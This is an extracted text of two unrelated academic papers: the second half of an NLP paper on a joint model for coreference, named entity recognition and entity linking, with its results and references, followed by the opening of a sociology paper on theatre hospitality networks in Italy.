outputs that are bad ac- cording to our loss functions (Gimpel and Smith, 2010). As in Durrett and Klein (2013), we take αc = 1 and use `c as defined there, penalizing the model by αc,FA = 0.1 for linking up a mention that should have been nonanaphoric, by αc,FN = 3 for calling nonanaphoric a mention that should have an antecedent, and by αc,WL = 1 for picking the wrong antecedent for an anaphoric mention. `t and `e are simply Hamming distance, with αt = 3 and αe = 0 for all experiments. We found that the outcome of learning was not particularly sensitive to these pa- rameters.7 We optimize our objective using AdaGrad (Duchi et al., 2011) with L1 regularization and λ = 0.001. Our final objective is L(θ) = d∑ i=1 log ∑ a∗∈A(C∗i ) p′(a∗,t∗i ,e ∗ i |x; θ)+λ‖θ‖1 This objective is nonconvex, but in practice we have found that it is very stable. One reason is that for any mention that has fewer than two antecedents in its cluster, all elements of A(C∗) only contain one possibility for that mention, and even for mentions with ambiguity, the parameters that the model ends up learning tend to place almost all of the probability mass consistently on one antecedent. 7These parameters allow us to trade off contributions to the objective from the different tasks, addressing Singh et al. (2013)’s objection to single objectives for joint models. 482 Dev Test MUC B3 CEAFe Avg. NER Link MUC B3 CEAFe Avg. NER Link INDEP. 77.95 74.81 71.84 74.87 83.04 73.07 81.03 74.89 72.56 76.16 82.35 74.71 JOINT 79.41 75.56 73.34 76.10 85.94 75.69 81.41 74.70 72.93 76.35 85.60 76.78 ∆ +1.46 +0.75 +1.50 +1.23 +2.90 +2.62 +0.42 −0.19 +0.37 +0.19 +3.25 +2.07 Table 1: Results on the ACE 2005 dev and test sets for the INDEP. (task-specific factors only) and JOINT models. Coreference metrics are computed using their reference implementations (Pradhan et al., 2014). We report accuracy on NER because the set of mentions is fixed and all mentions have named entity types. Coreference and NER are compared to prior work in a more standard setting in Section 6.3. Finally, we also report accuracy of our entity linker (including links to NIL); entity linking is analyzed more thoroughly in Table 2. Bolded values represent statistically significant improvements with p < 0.05 according to a bootstrap resampling test. 5 Inference For both learning and decoding, inference consists of computing marginals for individual variables or for sets of variables adjacent to a factor. Exact infer- ence is intractabile due to our factor graph’s loopi- ness; however, we can still perform efficient infer- ence using belief propagation, which has been suc- cessfully employed for a similar model (Durrett et al., 2013) as well as for other NLP tasks (Smith and Eisner, 2008; Burkett and Klein, 2012). Marginals typically converge in 3-5 iterations of belief propa- gation; we use 5 iterations for all experiments. However, belief propagation would still be quite computationally expensive if run on the full fac- tor graph as described in Section 3. In particu- lar, the factors in Section 3.2.2 and Section 3.2.3 are costly to sum over due to their ternary struc- ture and the fact that there are quadratically many of them in the number of mentions. The solu- tion to this is to prune the domains of the corefer- ence variables using a coarse model consisting of the coreference factors trained in isolation. Given marginals p0(ai|x), we prune values ai such that log p0(ai|x) < log p0(a∗i |x) −k for a threshold pa- rameter k, which we set to 5 for our experiments; this is sufficient to prune over 90% of possible coref- erence arcs while leaving at least one possible gold link for 98% of mentions.8 With this optimization, our full joint model could be trained for 20 iterations on the ACE 2005 corpus in around an hour. We use minimum Bayes risk (MBR) decoding, 8In addition to inferential benefits, pruning an arc allows us to prune entire joint coreference factors and avoid instantiating their associated features, which reduces the memory footprint and time needed to build a factor graph. where we compute marginals for each variable un- der the full model and independently return the most likely setting of each variable. Note that for coref- erence, this implies that we produce the MBR an- tecedent structure rather than the MBR clustering; the latter is much more computationally difficult to find and would be largely the same, since the poste- rior distributions of the ai are quite peaked. 6 Experiments We present results on two corpora. First, we use the ACE 2005 corpus (NIST, 2005): this corpus anno- tates mentions complete with coreference, semantic types (per mention), and entity links (also per men- tion) later added by Bentivogli et al. (2010). We evaluate on gold mentions in this setting for com- parability with prior work on entity linking; we lift this restriction in Section 6.3. Second, we evaluate on the OntoNotes 5 corpus (Hovy et al., 2006) as used in the CoNLL 2012 coreference shared task (Pradhan et al., 2012). This corpus does not contain gold-standard entity links, so we cannot evaluate this portion of our model, though the model still exploits the information from Wikipedia to make coreference and named entity de- cisions. We will compare to prior coreference and named entity work in the system mentions setting. 6.1 ACE Evaluation We tokenize and sentence-split the ACE dataset us- ing the tools bundled with Reconcile (Stoyanov et al., 2010) and parse it using the Berkeley Parser (Petrov et al., 2006). We use the train/test split from Stoyanov et al. (2009), Haghighi and Klein (2010), and Bansal and Klein (2012). 483 Non-NILS NILS Prec. Rec. F1 Prec. Rec. F1 Accuracy FAHRNI 81.15 78.10 79.60 41.25 61.10 49.25 76.87 INDEP. 80.26 76.30 78.23 33.39 54.47 41.40 74.71 JOINT 83.26 77.67 80.37 35.19 65.42 45.77 76.78 ∆ over INDEP. +3.00 +1.37 +2.14 +1.80 +10.95 +3.37 +2.07 Table 2: Detailed entity linking results on the ACE 2005 test set. We evaluate both our INDEP. (task-specific factors only) and JOINT models and compare to the results of the FAHRNI model, a state-of-the-art entity linking system. We compare overall accuracy as well as performance at predicting NILS (mentions not in the knowledge base) and non- NILS. The JOINT model roughly matches the performance of FAHRNI and gives strong gains over the INDEP. system. Table 1 shows our results. Coreference results are reported using MUC (Vilain et al., 1995), B3 (Bagga and Baldwin, 1998), and CEAFe (Luo, 2005), as well as their average, the CoNLL metric, all com- puted from the reference implementation of the CoNLL scorer (Pradhan et al., 2014). We see that the joint model improves all three tasks compared to the individual task models in the baseline. More in-depth entity linking results are shown in Table 2. We both evaluate on overall accuracy (how many mentions are correctly linked) as well as two more specific criteria: precision/recall/F1 of non- NIL9 predictions, and precision/recall/F1 of NIL pre- dictions. This latter measure may be important if a system designer is trying to identify new entities in a document. We compare to the results of the best model from Fahrni and Strube (2014), which is a sophisticated discriminative model incorporating a latent model of mention scope.10 Our performance is similar to that of Fahrni and Strube (2014), though the results are not exactly comparable for two reasons. First, our models are trained on different datasets: Fahrni and Strube (2014) train on Wikipedia data whereas we train on the ACE training set. Second, they make use of the annotated head spans in ACE whereas we only use detected heads based on automatic parses. Note that this information is particularly beneficial for locat- ing the right query because “heads” may be multi- word expressions such as West Bank as part of the phrase southern West Bank. 9 NIL is a placeholder for mentions which do not link to an article in Wikipedia. 10On the TAC datasets, this FAHRNI model substantially out- performs Ratinov et al. (2011) and has comparable performance to Cheng and Roth (2013), hence it is quite competitive. Coref NER Link INDEP. 74.87 83.04 73.07 INDEP+LINKNER +1.85 +2.41 INDEP+COREFNER +0.56 +1.15 INDEP+COREFLINK +0.48 −0.16 JOINT−LINKNER +0.79 +1.28 −0.06 JOINT−COREFNER +0.56 +1.94 +2.07 JOINT−COREFLINK +0.85 +2.68 +2.57 JOINT +1.23 +2.90 +2.62 JOINT/LATENTLINK +1.26 +3.47 −18.8 Table 3: Results of model ablations on the ACE devel- opment set. We hold out each type of factor in turn from the JOINT model and add each in turn over the IN- DEP. model. We evaluate the coreference performance using the CoNLL metric, NER accuracy, and entity link- ing accuracy. 6.2 Model Ablations To evaluate the importance of the different parts of the model, we perform a series of ablations on the model interaction factors. Table 3 shows the results of adding each interaction factor in turn to the base- line and removing each of the three interaction fac- tors from the full joint model (see Figure 4). Link–NER interactions. These joint factors are the strongest out of any considered here and give large improvements to entity linking and NER. Their utility is unsurprising: effectively, they give NER ac- cess to a gazetteer that it did not have in the baseline model. Moreover, our relatively rich featurization of the semantic information on Wikipedia allows the model to make effective use of it. Coref–NER interactions. These are moderately beneficial to both coreference and NER. Having re- 484 liable semantic types allows the coreference system to be bolder about linking up mention pairs that do not exhibit direct head matches. Part of this is due to our use of monolexical features, which are fine- grained enough to avoid the problems with coarse semantic type matching (Durrett and Klein, 2013) but still effectively learnable. Coref–Link interactions. These are the least use- ful of any of the major factors, providing only a small benefit to coreference. This is likely a re- sult of the ACE entity linking annotation standard: a mention like the company is not linked to the spe- cific company it refers to, but instead the Wikipedia article Company. Determining the relatedness of Company to an article like Dell is surprisingly difficult: many related articles share almost no out- links and may not explicitly link to one another. Further feature engineering could likely improve the utility of these factors. The last line of Table 3 shows the results of an ex- periment where the entity links were not observed during training, i.e. they were left latent. Unsur- prisingly, the system is not good at entity linking; however, the model is still able to do as well or even slightly better on coreference and named entity recognition. A possible explanation for this is that even the wrong Wikipedia link can in many cases provide correct semantic information: for example, not knowing which Donald Layton is being referred to is irrelevant for the question of determining that he is a PERSON and may also have little impact on coreference performance. This result indicates that the joint modeling approach is not necessarily de- pendent on having all tasks annotated. The model can make use of cross-task information even when that information comes via latent variables. 6.3 OntoNotes Evaluation The second part of our evaluation uses the datasets from the CoNLL 2012 Shared Task (Pradhan et al., 2012), specifically the coreference and NER anno- tations. All experiments use the standard automatic parses from the shared task and mentions detected according to the method of Durrett and Klein (2013). Evaluating on OntoNotes carries with it a few complications. First, gold-standard entity linking annotations are not available; we can handle this by a1 a2 e1 e2 q1 q2 t1 t2 Dell }O B-ORG I-ORG ... ... NE R+ Co ref Li nk +C ore f NE R+ Li nk The company ... t8 t9 posted ... Figure 5: Modified factor graph for OntoNotes-style an- notations, where NER chunks can now diverge from men- tions for the other two tasks. NER is now modeled with token-synchronous random variables taking values in a BIO tagset. Factors coupling NER and the other tasks now interact with the NER chain via the NER nodes as- sociated with the heads of mentions. leaving the ei variables in our model latent. Second, and more seriously, NER chunks are no longer the same as coreference mentions, so our assumption of fixed NER spans no longer holds. 6.3.1 Divergent Coreference and NER Our model can be adapted to handle NER chunks that diverge from mentions for the other two tasks, as shown in Figure 5. We have kept the coreference and entity linking portions of our model the same, now defined over system predicted mentions. However, we have replaced mention-synchronous type vari- ables with standard token-synchronous BIO-valued variables. The unary NER features developed in Section 3.1.2 are now applied in the standard way, namely they are conjoined with the BIO labels at each token position. Binary factors between adja- cent NER nodes enforce appropriate structural con- straints and fire indicator features on transitions. In order to maintain tractability in the face of a larger number of variables and factors in the NER portion of our model, we prune the NER variables’ domains using the NER model trained in isolation, similar to the procedure that we described for pruning corefer- ence arcs in Section 5. 485 MUC B3 CEAFe Avg. Prec. Rec. F1 Prec. Rec. F1 Prec. Rec. F1 F1 BERKELEY 72.85 65.87 69.18 63.55 52.47 57.48 54.31 54.36 54.34 60.33 FERNANDES − − 70.51 − − 57.58 − − 53.86 60.65 BJORKELUND 74.30 67.46 70.72 62.71 54.96 58.58 59.40 52.27 55.61 61.63 INDEP. 72.25 69.30 70.75 60.92 55.73 58.21 55.33 54.14 54.73 61.23 JOINT 72.61 69.91 71.24 61.18 56.43 58.71 56.17 54.23 55.18 61.71 Table 4: CoNLL metric scores for our systems on the CoNLL 2012 blind test set, compared to Durrett and Klein (2013) (the Berkeley system), Fernandes et al. (2012) (the winner of the CoNLL shared task), and Björkelund and Kuhn (2014) (the best reported results on the dataset to date). INDEP. and JOINT are the contributions of this work; JOINT improves substantially over INDEP. (these improvements are statistically significant with p < 0.05 according to a bootstrap resampling test) and achieves state-of-the-art results. Cross-task factors that previously would have fired features based on the NE type for a whole men- tion now instead consult the NE type of that men- tion’s head.11 In Figure 5, this can be seen with fac- tors involving e2 and a2 touching t9 (company), the head of the second mention. Since the chain struc- ture enforces consistency between adjacent labels, features that strongly prefer a particular label on one node of a mention will implicitly affect other nodes in that mention and beyond. Training and inference proceed as before, with a slight modification: instead of computing the MBR setting of every variable in isolation, we instead compute the MBR sequence of labeled NER chunks to avoid the problem of producing inconsistent tag sequences, e.g. O I-PER or B-PER I-ORG. 6.3.2 Results Table 4 shows coreference results from our IN- DEP. and JOINT models compared to three strong systems: Durrett and Klein (2013), Fernandes et al. (2012) (the winner of the CoNLL shared task), and Björkelund and Kuhn (2014) (the best reported re- sults on the dataset). Our JOINT method outper- forms all three as well as the INDEP. system.12 Next, we report results on named entity recogni- tion. We use the same OntoNotes splits as for the coreference data; however, the New Testament (NT) 11The NER-coreference portion of the model now resembles the skip-chain CRF from Finkel et al. (2005), though with soft coreference. 12The systems of Chang et al. (2013) and Webster and Curran (2014) perform similarly to the FERNANDES system; changes in the reference implementation of the metrics make exact com- parison to printed numbers difficult. Prec. Rec. F1 ILLINOIS 82.00 84.95 83.45 PASSOS − − 82.24 INDEP. 83.79 81.53 82.64 JOINT 85.22 82.89 84.04 ∆ over INDEP. +1.43 +1.36 +1.40 Table 5: Results for NER tagging on the OntoNotes 5.0 / CoNLL 2011 test set. We compare our systems to the Illinois system (Ratinov and Roth, 2009) and the system of Passos et al. (2014). Our model outperforms both other systems in terms of F1, and once again joint modeling gives substantial improvements over our baseline system. portion of the CoNLL 2012 test set does not have gold-standard named entity annotations, so we omit it from our evaluation. This leaves us with exactly the CoNLL 2011 test set. We compare to two ex- isting baselines from the literature: the Illinois NER system of Ratinov and Roth (2009) and the results of Passos et al. (2014). Table 5 shows that we out- perform both prior systems in terms of F1, though the ILLINOIS system features higher recall while our system features higher precision. 7 Related Work There are two closely related threads of prior work: those that address the tasks we consider in a dif- ferent way and those that propose joint models for other related sets of tasks. In the first category, Hajishirzi et al. (2013) integrate entity linking into a sieve-based coreference system (Raghunathan et al., 2010), the aim being to propagate link deci- sions throughout coreference chains, block corefer- 486 ence links between different entities, and use seman- tic information to make additional coreference links. Zheng et al. (2013) build coreference clusters greed- ily left-to-right and maintain entity link information for each cluster, namely a list of possible targets in the knowledge base as well as a current best link tar- get that is used to extract features (though that might not be the target that is chosen by the end of infer- ence). Cheng and Roth (2013) use coreference as a preprocessing step for entity linking and then solve an ILP to determine the optimal entity link assign- ments for each mention based on surface properties of that mention, other mentions in its cluster, and other mentions that it is related to. Compared to these systems, our approach maintains greater un- certainty about all random variables throughout in- ference and uses features to capture cross-task in- teractions as opposed to rules or hard constraints, which can be less effective for incorporating seman- tic knowledge (Lee et al., 2011). The joint model most closely related to ours is that of Singh et al. (2013), modeling coreference, named entity recognition, and relation extraction. Their techniques differ from ours in a few notable ways: they choose a different objective function than we do and also opt to freeze the values of certain vari- ables during the belief propagation process rather than pruning with a coarse pass. Sil and Yates (2013) jointly model NER and entity linking in such a way that they maintain uncertainty over mention bound- aries, allowing information from Wikipedia to in- form segmentation choices. We could strengthen our model by integrating this capability; however, the primary cause of errors for mention detection on OntoNotes is parsing ambiguities rather than named entity ambiguities, so we would be unlikely to see improvements in the experiments presented here. Beyond maintaining uncertainty over men- tion boundaries, we might also consider maintain- ing uncertainty over the entire parse structure, as in Finkel and Manning (2009), who consider parsing and named entity recognition together with a PCFG. 8 Conclusion We return to our initial motivation for joint model- ing, namely that the three tasks we address have the potential to influence one another. Table 3 shows that failing to exploit any of the pairwise interac- tions between the tasks causes lower performance on at least one of them. Therefore, any pipelined sys- tem would necessarily underperform a joint model on whatever task came first in the pipeline, which is undesirable given the importance of these tasks. The trend towards broader and deeper NLP pipelines will only exacerbate this problem and make it more dif- ficult to find a suitable pipeline ordering. In addition to showing that joint modeling is high-performing, we have also shown that it can be implemented with relatively low overhead, requiring no fundamentally new learning or inference techniques, and that it is extensible, due to its modular structure and natural partitioning of features. Taken together, these as- pects make a compelling case that joint models can provide a way to integrate deeper levels of process- ing, particularly for semantic layers of annotation, and that this modeling power does not need to come at the expense of computational efficiency, structural simplicity, or modularity. The Berkeley Entity Resolution System is avail- able at http://nlp.cs.berkeley.edu. Acknowledgments This work was partially supported by BBN under DARPA contract HR0011-12-C-0014, by an NSF fellowship for the first author, and by a Google Fac- ulty Research Award to the second author. Thanks to Angela Fahrni for helpful discussions about en- tity linking and for providing system output, to the anonymous reviewers for their insightful comments, and to our action editor Jason Eisner. References Amit Bagga and Breck Baldwin. 1998. Algorithms for Scoring Coreference Chains. In Proceedings of the Conference on Language Resources and Evaluation Workshop on Linguistics Coreference. Mohit Bansal and Dan Klein. 2012. Coreference Seman- tics from Web Features. In Proceedings of the Associ- ation for Computational Linguistics. Luisa Bentivogli, Pamela Forner, Claudio Giuliano, Alessandro Marchetti, Emanuele Pianta, and Kateryna Tymoshenko. 2010. Extending English ACE 2005 Corpus Annotation with Ground-truth Links to Wikipedia. In Proceedings of the Workshop on 487 The People’s Web Meets NLP: Collaboratively Con- structed Semantic Resources. Anders Björkelund and Jonas Kuhn. 2014. Learn- ing Structured Perceptrons for Coreference Resolution with Latent Antecedents and Non-local Features. In Proceedings of the Association for Computational Lin- guistics. David Burkett and Dan Klein. 2012. Fast Inference in Phrase Extraction Models with Belief Propagation. In Proceedings of the North American Chapter of the As- sociation for Computational Linguistics. Kai-Wei Chang, Rajhans Samdani, and Dan Roth. 2013. A Constrained Latent Variable Model for Coreference Resolution. In Proceedings of the Conference on Em- pirical Methods in Natural Language Processing. Xiao Cheng and Dan Roth. 2013. Relational Inference for Wikification. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. Silviu Cucerzan. 2007. Large-Scale Named Entity Dis- ambiguation Based on Wikipedia Data. In Proceed- ings of the Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning (EMNLP-CoNLL). Hal Daumé, III and Daniel Marcu. 2005. A Large-scale Exploration of Effective Global Features for a Joint Entity Detection and Tracking Model. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. Pascal Denis and Jason Baldridge. 2008. Specialized Models and Ranking for Coreference Resolution. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. Mark Dredze, Paul McNamee, Delip Rao, Adam Ger- ber, and Tim Finin. 2010. Entity Disambiguation for Knowledge Base Population. In Proceedings of the In- ternational Conference on Computational Linguistics. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive Subgradient Methods for Online Learning and Stochastic Optimization. Journal of Machine Learning Research, 12:2121–2159, July. Greg Durrett and Dan Klein. 2013. Easy Victories and Uphill Battles in Coreference Resolution. In Proceed- ings of the Conference on Empirical Methods in Natu- ral Language Processing, October. Greg Durrett, David Hall, and Dan Klein. 2013. Decen- tralized Entity-Level Modeling for Coreference Reso- lution. In Proceedings of the Association for Compu- tational Linguistics. Angela Fahrni and Michael Strube. 2014. A Latent Variable Model for Discourse-aware Concept and En- tity Disambiguation. In Proceedings of the European Chapter of the Association for Computational Linguis- tics. Eraldo Rezende Fernandes, Cı́cero Nogueira dos Santos, and Ruy Luiz Milidiú. 2012. Latent Structure Per- ceptron with Feature Induction for Unrestricted Coref- erence Resolution. In Proceedings of the Joint Con- ference on Empirical Methods in Natural Language Proceedings and Conference on Computational Nat- ural Language Learning - Shared Task. Jenny Rose Finkel and Christopher D. Manning. 2009. Joint Parsing and Named Entity Recognition. In Pro- ceedings of the North American Chapter for the Asso- ciation for Computational Linguistics. Jenny Rose Finkel, Trond Grenager, and Christopher Manning. 2005. Incorporating Non-local Information into Information Extraction Systems by Gibbs Sam- pling. In Proceedings of the Association for Computa- tional Linguistics. Kevin Gimpel and Noah A. Smith. 2010. Softmax- Margin CRFs: Training Log-Linear Models with Cost Functions. In Proceedings of the North American Chapter for the Association for Computational Lin- guistics. Yuhang Guo, Bing Qin, Yuqin Li, Ting Liu, and Sheng Li Li. 2013. Improving Candidate Generation for Entity Linking. In Natural Language Processing and Infor- mation Systems. Ben Hachey, Will Radford, Joel Nothman, Matthew Hon- nibal, and James R. Curran. 2013. Evaluating En- tity Linking with Wikipedia. Artificial Intelligence, 194:130–150, January. Aria Haghighi and Dan Klein. 2009. Simple Coreference Resolution with Rich Syntactic and Semantic Features. In Proceedings of the Conference on Empirical Meth- ods in Natural Language Processing. Aria Haghighi and Dan Klein. 2010. Coreference Res- olution in a Modular, Entity-Centered Model. In Pro- ceedings of the North American Chapter of the Asso- ciation for Computational Linguistics. Hannaneh Hajishirzi, Leila Zilles, Daniel S. Weld, and Luke Zettlemoyer. 2013. Joint Coreference Res- olution and Named-Entity Linking with Multi-Pass Sieves. In Proceedings of the Conference on Empir- ical Methods in Natural Language Processing. Johannes Hoffart, Mohamed Amir Yosef, Ilaria Bordino, Hagen Fürstenau, Manfred Pinkal, Marc Spaniol, Bilyana Taneva, Stefan Thater, and Gerhard Weikum. 2011. Robust Disambiguation of Named Entities in Text. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. Eduard Hovy, Mitchell Marcus, Martha Palmer, Lance Ramshaw, and Ralph Weischedel. 2006. OntoNotes: The 90% Solution. In Proceedings of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Short Papers. 488 Heng Ji and Ralph Grishman. 2011. Knowledge Base Population: Successful Approaches and Challenges. In Proceedings of the Association for Computational Linguistics. Jun’ichi Kazama and Kentaro Torisawa. 2007. Exploit- ing Wikipedia as External Knowledge for Named En- tity Recognition. In Proceedings of the Joint Confer- ence on Empirical Methods in Natural Language Pro- cessing and Computational Natural Language Learn- ing. Terry Koo, Xavier Carreras, and Michael Collins. 2008. Simple Semi-supervised Dependency Parsing. In Pro- ceedings of the Association for Computational Lin- guistics. John D. Lafferty, Andrew McCallum, and Fernando C. N. Pereira. 2001. Conditional Random Fields: Proba- bilistic Models for Segmenting and Labeling Sequence Data. In Proceedings of the International Conference on Machine Learning. Heeyoung Lee, Yves Peirsman, Angel Chang, Nathanael Chambers, Mihai Surdeanu, and Dan Jurafsky. 2011. Stanford’s Multi-Pass Sieve Coreference Resolution System at the CoNLL-2011 Shared Task. In Proceed- ings of the Conference on Computational Natural Lan- guage Learning: Shared Task. Qi Li and Heng Ji. 2014. Incremental Joint Extraction of Entity Mentions and Relations. In Proceedings of the Association for Computational Linguistics. Xiaoqiang Luo. 2005. On Coreference Resolution Per- formance Metrics. In Proceedings of the Conference on Empirical Methods in Natural Language Process- ing. David Milne and Ian H. Witten. 2008. Learning to Link with Wikipedia. In Proceedings of the Conference on Information and Knowledge Management. Vincent Ng. 2010. Supervised Noun Phrase Coreference Research: The First Fifteen Years. In Proceedings of the Association for Computational Linguistics. NIST. 2005. The ACE 2005 Evaluation Plan. In NIST. Joel Nothman, Nicky Ringland, Will Radford, Tara Mur- phy, and James R. Curran. 2013. Learning Multilin- gual Named Entity Recognition from Wikipedia. Arti- ficial Intelligence, 194:151–175, January. Alexandre Passos, Vineet Kumar, and Andrew McCal- lum. 2014. Lexicon Infused Phrase Embeddings for Named Entity Resolution. In Proceedings of the Con- ference on Computational Natural Language Learn- ing. Slav Petrov, Leon Barrett, Romain Thibaux, and Dan Klein. 2006. Learning Accurate, Compact, and Inter- pretable Tree Annotation. In Proceedings of the Con- ference on Computational Linguistics and the Associ- ation for Computational Linguistics. Simone Paolo Ponzetto and Michael Strube. 2006. Exploiting Semantic Role Labeling, WordNet and Wikipedia for Coreference Resolution. In Proceed- ings of the North American Chapter of the Association of Computational Linguistics. Sameer Pradhan, Lance Ramshaw, Mitchell Marcus, Martha Palmer, Ralph Weischedel, and Nianwen Xue. 2011. CoNLL-2011 Shared Task: Modeling Unre- stricted Coreference in OntoNotes. In Proceedings of the Conference on Computational Natural Language Learning: Shared Task. Sameer Pradhan, Alessandro Moschitti, Nianwen Xue, Olga Uryupina, and Yuchen Zhang. 2012. CoNLL- 2012 Shared Task: Modeling Multilingual Unre- stricted Coreference in OntoNotes. In Joint Confer- ence on EMNLP and CoNLL - Shared Task. Sameer Pradhan, Xiaoqiang Luo, Marta Recasens, Ed- uard Hovy, Vincent Ng, and Michael Strube. 2014. Scoring Coreference Partitions of Predicted Mentions: A Reference Implementation. In Proceedings of the Association for Computational Linguistics. Karthik Raghunathan, Heeyoung Lee, Sudarshan Ran- garajan, Nathanael Chambers, Mihai Surdeanu, Dan Jurafsky, and Christopher Manning. 2010. A Multi- Pass Sieve for Coreference Resolution. In Proceed- ings of the Conference on Empirical Methods in Natu- ral Language Processing. Altaf Rahman and Vincent Ng. 2011. Coreference Res- olution with World Knowledge. In Proceedings of the Association for Computational Linguistics: Hu- man Language Technologies. Lev Ratinov and Dan Roth. 2009. Design Challenges and Misconceptions in Named Entity Recognition. In Proceedings of the Conference on Computational Nat- ural Language Learning. Lev Ratinov and Dan Roth. 2012. Learning-based Multi-sieve Co-reference Resolution with Knowledge. In Proceedings of the Joint Conference on Empirical Methods in Natural Language Processing and Com- putational Natural Language Learning. Lev Ratinov, Dan Roth, Doug Downey, and Mike Ander- son. 2011. Local and Global Algorithms for Disam- biguation to Wikipedia. In Proceedings of the Associ- ation for Computational Linguistics. Avirup Sil and Alexander Yates. 2013. Re-ranking for Joint Named-Entity Recognition and Linking. In Pro- ceedings of the International Conference on Informa- tion and Knowledge Management. Sameer Singh, Sebastian Riedel, Brian Martin, Jiaping Zheng, and Andrew McCallum. 2013. Joint Inference of Entities, Relations, and Coreference. In Proceed- ings of the 2013 Workshop on Automated Knowledge Base Construction. 489 David A. Smith and Jason Eisner. 2008. Dependency Parsing by Belief Propagation. In Proceedings of the Conference on Empirical Methods in Natural Lan- guage Processing. Wee Meng Soon, Hwee Tou Ng, and Daniel Chung Yong Lim. 2001. A Machine Learning Approach to Coref- erence Resolution of Noun Phrases. Computational Linguistics, 27(4):521–544, December. Veselin Stoyanov, Nathan Gilbert, Claire Cardie, and Ellen Riloff. 2009. Conundrums in Noun Phrase Coreference Resolution: Making Sense of the State- of-the-Art. In Proceedings of the Association for Com- putational Linguistics. Veselin Stoyanov, Claire Cardie, Nathan Gilbert, Ellen Riloff, David Buttler, and David Hysom. 2010. Coref- erence Resolution with Reconcile. In Proceedings of the Association for Computational Linguistics: Short Papers. Marc Vilain, John Burger, John Aberdeen, Dennis Con- nolly, and Lynette Hirschman. 1995. A Model- Theoretic Coreference Scoring Scheme. In Proceed- ings of the Conference on Message Understanding. Kellie Webster and James R. Curran. 2014. Limited Memory Incremental Coreference Resolution. In Pro- ceedings of the Conference on Computational Linguis- tics. Tong Zhang and David Johnson. 2003. A Robust Risk Minimization Based Named Entity Recognition Sys- tem. In Proceedings of the Conference on Natural Language Learning. Jiaping Zheng, Luke Vilnis, Sameer Singh, Jinho D. Choi, and Andrew McCallum. 2013. Dynamic Knowledge-Base Alignment for Coreference Resolu- tion. In Proceedings of the Conference on Computa- tional Natural Language Learning. 490 work_hs2hyu7fgngxhkf2o4s6gyqxxi ---- Microsoft Word - Volume37_final insna.org | Issues 1&2 | Volume 37 | 69 Strategic and Genetic Networking: Relational Endowment in a Local Cultural Offer Andrea Gallelli Sociologist, independent researcher Abstract The local theatrical offer is the result of all the theatre companies which perform shows in each other’s venues. Theatre hospitality is an inherently relational phenomenon, and besides big national and international tours, it is an important part of the local cultural landscape. Aiming at contributing to the literature on network analysis applied to the inquiry on culture, the research adopts the network perspective to test hypotheses on companies’ relational be- haviors and mechanisms of network formation in a local context in Italy. The analyses show that companies which get more public funding tend to host more; there is a homophily effect based on audience levels; companies tend to reciprocate hospitality relations and form clusters of close collaborations. Keywords: cultural production; theatre; social network analysis; ERGM; arts This research did not receive any specific grant from funding agencies in the public, commer- cial, or not-for-profit sectors. Author Andrea Gallelli holds a PhD in sociology from the University of Turin, where he conducted research on the relational dimension of culture. He has been post-doctoral research fellow at the University of Bologna, where he worked for the EU project Interco-SSH (International cooperation in the social sciences and humanities), about the institutionalization of the social sciences in Europe, with a special focus on networks in scientific production and the interna- tional circulation of key authors such as Bourdieu and Gramsci. His research mainly focuses on social capital and social networks, with applications on cultural production, scientific communities and social exclusion. Acknowledgements This work would not have been possible without the collaboration and the data provided by Osservatorio Culturale del Piemonte. My thanks go to the OCP staff. The author is also indebted to Valerio Leone Sciabolazza, University of Florida, for precious technical support on ERG models. Please send all correspondence to andrea.gallelli@mail.com Connections Strategic and Genetic Networking 70 | Volume 37 | Issues 1&2 | insna.org 1. Introduction What do we see when we go to the theatre? Of course we see a company performing a piece, and our cultural tastes are responsi- ble for whether we enjoy the show or not. But tastes apart, when we go to the theatre we probably see a company which does not own the venue in which the show is taking place. So, in most cases, when we decide to go to the theatre we make a dou- ble choice: we choose a show, because we think we will probably enjoy it, and we choose a theatre, because it is close to home, because it is beautiful, because we have a subscription, and so forth. In any case, that specific show involves two dif- ferent subjects, one company and one thea- tre. And so it is for all the theatre seasons. So, we can say that the whole cultural offer in a specific place in a specific moment, is the result of all the possible pairs of host- ing and hosted subjects. If we now turn the perspective from the consumer (who goes to the theatre) to the producer (any possible local theatre company), we understand that each theatre season is the result of the movement of all the companies that host each other. This is precisely hospitality in theatre, it is an in- herently relational phenomenon, consisting of connections among theatre companies that perform in each other’s spaces, and, together with big national and international companies’ tours, it is a very important part of the local cultural landscape. So, what are the reasons that lead two particular companies to connect? Are there companies more inclined to host, and others more inclined to move? Are there groups of companies that tend to host each other, forming cultural clusters? Are con- nected companies somehow similar? In this study we observe the struc- tural properties of the theatre offer in a lo- cal context in Italy, and we propose hy- potheses about network formation mecha- nisms. We use network descriptives and exponential random graphs models, which allow a joint observation of individual properties and structural configurations, in order to observe the social mechanisms that shape the cultural offer. 2. Analytical framework 2.1 An introduction to the relational look on culture Scholars and experts in widely different fields have underlined the importance of the relational dimension of cultural pro- duction, which has been defined and em- pirically shown in different ways. Broadly speaking, major sociologists agree on a vi- sion of the cultural field as somehow grounded on systems of relations generat- ing and maintaining it. For Pierre Bourdieu social capital consists of “the aggregate of the actual or potential resources which are linked to the possession of a durable network of more or less institutionalized relationships of mutu- al acquaintance and recognition” (1986, p. 248), and these sets of relational resources, together with economic and cultural capi- tal, are responsible for the position occu- pied by each individual within the social space of a field. Following Howard Becker, “all ar- tistic work, like all human activity, in- volves the joint activity of a number, often a large number, of people. Through their cooperation, the art work we eventually see or hear comes to be or continues to be” (1982, p. 1). In the analysis of cultural production he underlines the importance of networks, considered as the cooperative activity of all the subjects involved in the construction of the art worlds. Moreover, according to the produc- tion of culture perspective (Peterson and Anand 2004) the industry structure in the creative fields depends on the ways in which producers relate to one another – many small enterprises in competition, few big vertically integrated ones, or different combinations of these forms – and the dif- ferent configurations of producers deter- mine the presence of certain kinds of prod- ucts in the marketplace. Strategic and Genetic Networking Connections insna.org | Issues 1&2 | Volume 37 | 71 Each of these approaches empha- sizes a different aspect of the structural properties of the cultural field. Bourdieu focuses on the positions of the subjects in- volved in the field, and on how these posi- tions generate advantages in the field for those with a good social capital base. Becker attributes great importance to rela- tions as a necessary part of the creative process. The production of culture perspec- tive looks at the characteristics of groups of producers in order to assess some gen- eral properties of cultural markets and in- dustries. Even with substantial differences, all these perspectives on culture recognize that the ways in which the producers relate among them have profound consequences 